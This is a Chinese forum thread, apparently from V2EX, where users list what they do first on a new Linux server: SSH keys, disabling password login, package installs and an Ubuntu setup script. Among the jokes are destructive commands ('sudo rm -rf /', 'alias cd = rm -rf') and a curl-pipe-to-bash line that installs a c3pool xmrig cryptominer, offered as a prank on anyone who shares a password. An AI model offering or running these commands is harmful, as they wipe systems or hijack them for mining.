当我拿到一台全新 Linux 服务器我会做什么

vim

alias vi = ‘vim’

比如把 IP 发到 V 站做个压测？

如果是局域网，那么我会装上 avahi ，这样我可以用 $hostname.local 域名直接访问

把 ssh 公钥加进去，关闭密码访问

我会有个记事本记录新服务器准备工作和用到的命令，每次都复制粘贴运行，
hostnamectl,
locale-gen,
useradd,
install git curl,
获取 bash 和 vim 之类配置文件，
ssh authorized_keys,
clash,
mutt smtp, 服务器报警发邮件到个人邮箱，
mount webdav 获取我的 Let’s Encrypt https 证书，

DHCP DNS 先搞清楚，最好配置 DOH ，min ttl 限制
yabs 等全家桶脚本跑一遍，性能，网速，区域解锁，黑名单心里有数
看看邻居都是干啥的，心里有数
zerotier 等一堆 apt install

sudo apt install vim htop avahi-daemon

1~3 三条不会做

poweroff

上 v2 问

1 、开启 root 登录
2 、拉取公钥并禁用密码登录
3 、安装 docker 、nano 、screen 、htop 、rclone
4 、配置 crontab 定期拉取 OSS 配置文件
5 、docker 安装 SS\FRP\tailscale\zerotier\watchtower
6 、配置域名

sudo rm -rf /
reboot

我是先搭个 v2ray 飞机场

首先当然是看看机器的配置
free -g
lsblk -T
lscpu

sudo apt/yum install sl
sl

添加 ssh 公钥，禁止密码登录
装 docker ，装 portainer agent ，连上 portainer 主控机
docker 装 tailscale

1. 更改， ntp 生效
2. 打丁
3. Reboot

反了呀，先有目的才有行为，我有台机器只装了 docker ，vim 都没，因为自带的是 vi 。

自己内网的话只做 1 、2 、5.

- 借助内网 DHCP 和 DNS ，放弃人脑 IPAM ，固定 IP 可以不做了，hostnametl 加 dhcp ，主机名访问
- docker remote api 加 docker context ，基本上没有在 Linux 主机本地文本编辑的需求了，默认 vi 凑合够用了

update

改装 gentoo

更新、修改 ssh 、docker

安装一个 sl ，跑一下

@miv sl is short for ..?

@iLoveSS 就是一个跑火车的命令，玩玩

配置好 ssh 密钥后 ansible 一把梭

你会在 V2EX 发个帖子

第一个应该是安装 tmux

@iLoveSS 小火车，有点意思

修改 ssh ，安装 docker ，把常用 ubuntu 容器打包在新机器上运行

跑个测速脚本

开 ssh ，让 @defunct9 上去看看

Server Install SOP (Ubuntu)

sudo apt update
sudo apt upgrade -y
sudo apt install -y ufw git zip unzip python3-venv python3-pip bash-completion vim sudo curl wget tree iftop iotop bpytop ufw
mkdir -p ~/.ssh

curl https://github.com/baobao1270.keys -o ~/.ssh/authorized_keys
sudo sed -i "/^#HostKey/s/^#//g" /etc/ssh/sshd_config
sudo sed -i "/^#ListenAddress 0.0.0.0/s/^#//g" /etc/ssh/sshd_config
sudo sed -i "/^#PubkeyAuthentication yes/s/^#//g" /etc/ssh/sshd_config
sudo sed -i "s/^#PasswordAuthentication yes$/PasswordAuthentication no/g" /etc/ssh/sshd_config

sudo sed -i "/^#force_color_prompt=yes/s/^#//g" /etc/skel/.bashrc
cp /etc/skel/.bashrc ~/
sudo cp /etc/skel/.bashrc /root

echo 'net.ipv6.conf.default.disable_ipv6 = 1' | sudo tee -a /etc/sysctl.conf
echo 'net.ipv6.conf.all.disable_ipv6 = 1' | sudo tee -a /etc/sysctl.conf
echo 'net.ipv6.conf.lo.disable_ipv6 = 1' | sudo tee -a /etc/sysctl.conf
sudo sysctl -p
sudo sed -i "s/^IPV6=yes$/IPV6=no/g" /etc/default/ufw
sudo ufw allow openssh
sudo ufw enable

安装一个 nox 版本 emacs,配置一下，然后该干嘛干嘛

安装 360 ，电脑管家，金山毒霸（ dog ）

这不装个 360 ？ 要不然不安全 要么 rrm -rf / （多打个 r 防止新手）

rm -rf / 测试磁盘性能

share 一下密码，让我来告诉你我会干什么

curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s ***

如果你是新手，dd 备份一下。
1 、2 、3 、4 、5 都不会做

@1423 yabs 全家桶脚本是什么?

@totoro625 docker 安装 SS\FRP\tailscale\zerotier\watchtower, 出个教程呗

rm -rf /

alias ll='ls -ahl'

先把公钥丢进去，再装个 zsh+oh my zsh 改个主题

@iGuChin #42 docker run 没啥教程的，跑起来就行

运行初始化脚本: https://github.com/librz/shell-scripts

@Dk2014 一点都不好笑

ls

拿去看看市场价格

装个探针，等到期系统回收。

rm -rf /

apt update
apt upgrade

装个 bt

@Dk2014 大佬，执行完第一条，执行第二条就出错了
Traceback (most recent call last):
File "/usr/lib/command-not-found", line 28, in <module>
from CommandNotFound import CommandNotFound
File "/usr/lib/python3/dist-packages/CommandNotFound/CommandNotFound.py", line 19, in <module>
from CommandNotFound.db.db import SqliteDatabase
File "/usr/lib/python3/dist-packages/CommandNotFound/db/db.py", line 6, in <module>
apt_pkg.init()
apt_pkg.Error: W:Unable to read /etc/apt/apt.conf.d/ - DirectoryExists (2: No such file or directory), E:Error reading the CPU table

服务器上 没装 oh my zsh

@boris1993Jr
@hgc81538
@beyondsoft
@1423

感谢几位的分享，已经更新到 [blog]( https://github.com/SaminZou/study-prj/blob/master/blog/%E5%B8%B8%E7%94%A8%E8%BD%AF%E4%BB%B6%E4%BD%BF%E7%94%A8%E6%8C%87%E5%8D%97/%E5%85%A8%E6%96%B0%20Linux%20%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE.md)

问下各位大佬，由于 centos7 不支持 nvim-0.8 版本，怎么快速使用 nvim ？

@lessMonologue 我 centos7 + glibc 1.17 可以跑官方的 AppImage 。刚出 0.8.0 时因为 GitHub Actions 他们一度去掉了对旧 glibc 的支持，后来又加回来了。

先测试下 vps 性能

curl -sSf https://dotfiles.yejun.me/install.sh | bash -s -- server

在路由器上绑定 MAC ，然后设置 DHCP 分配固定 IP ，然后开 ssh 加公钥，再开个无密码 su 。

为什么要用 linux

alias cd = ‘rm -rf’

先 d 一遍镜像

干嘛要 root 远程 普通用户上去 sudo 不更合适点
我会安装 screen 或者 tmux 这种 下次登录还可以继续 没有 nano 就安一个 vi 用着不习惯 其他看服务器要了干嘛再做打算

@ltkun 想请教下，如果改用其它用户登陆再 su ，然后 path 都没有了，连运行个 reboot 都要 /sbin/reboot ，这里是有什么窍门吗？（如果开机直接设 root 账号登陆就不会有这样的问题）。而如果设置了其它用户，哪怕后来在 sshd 里改运行 root 登陆，一样会出现 path 不完整

df -h

dotbot install!

@kaiki 这种事还是 hostloc 的 mjj 干的多

Ubuntu 的话先删 snap 比较清爽

那必然是禁用密码登录

neofetch

锁全部端口访问，然后打开宝塔官网

重装成 Windows 打游戏

用脚本测网速
测本地电脑到它的延迟

没有人格式化，装 windows

替换 ls 安装 exa

更改 mirror, sudo apt-get update, sudo apt-get upgrade -y

第二条是不是搞错了，应该是禁止 root 远程登录吧？

先把 apt 源切换到清华镜像，不然没法安装软件，墙好厚

@lzuntalented 确实，我一般切北大源，清华源最近太挤了

apt update
apt install sudo
sudo passwd

问我学长该干嘛 @outtime

先把 shell 体验提升一下
https://github.com/hanke0/dotfiles

服务器的 ssh 添加电脑 ssh key 。电脑 vs code Remote 添加服务器配置，点“在新窗口链接...”

装个 windows

@billytom 直接 bashrc 里面把 path 都设置好 建议加入 wheel 组 sudo 一般也不用 su

omz 还是不太建议。
先把 cer 登录搞上。

sudo shutdown -h now

重装系统。
在我看来，预先装好的系统并不是 100%可信。

@kaiki 我看一下啊，我服务器 IP 是 127.0.0.1

1. 主机名，新用户
2. zsh 和我的 zshrc zshenv zshalias （不是 ohmyzsh ，自己手写的）
3. ssh 配置，改端口，禁密码
4. 我的 gpg 公钥（备份加密用）
5. 我的 iptables 规则，默认留下 80 443 ssh 端口，其他全禁
6. 装 node-exporter 加到监控里
7. 装 ipset 设置 ip 黑名单，从 blackip.ustc.edu.cn 拉的 （可选）
8. 跑了服务就把备份弄好 （可选）

2 在我的 dotfile 仓库 git clone ssh://git.lin.moe/dotfiles
7 、8 的脚本和 systemd service/timer 在 ssh://git.lin.moe/systools ，没写说明，脚本简单，有需要自己看

有模板。。拉下来什么都配置好了

自己信任的系统先部署一遍

开启 root 用户。

ssh 启用密码登录。（密码设为 32 位随机字符）

禁用防火墙、禁用 selinux 。

给服务器取个名字设为 hostname ，在自己域名的管理界面加一条 hostname.s.example.com 的 DNS 记录指向服务器 IP ，这样就不用记服务器 IP 了。

（ CentOS / RHEL 系）删除 .bashrc 里默认的 alias rm="rm -i" 和 alias mv="mv -i"

一般第一件事是执行 update ，把系统更新一下，然后再开始装上几个常用的工具。再之后的操作看具体需求。

apt update
然后改密码，没 root 用户会先开 root 用户

1. ssh-copy-id 添加公钥允许免密码 SSH 登录
1. 更新系统
1. 用 zim 配置 zsh 环境
1. 添加 docker
1. frp 内网穿透

现在的话，应该还会部署一个 vpn 中转，传文件和局域网玩游戏

装 centos7-gnome 、修改本地镜像源、yum install gcc make 、yum install kernel kernel-devel 、 装网卡驱动、换镜像源、装宝塔、建站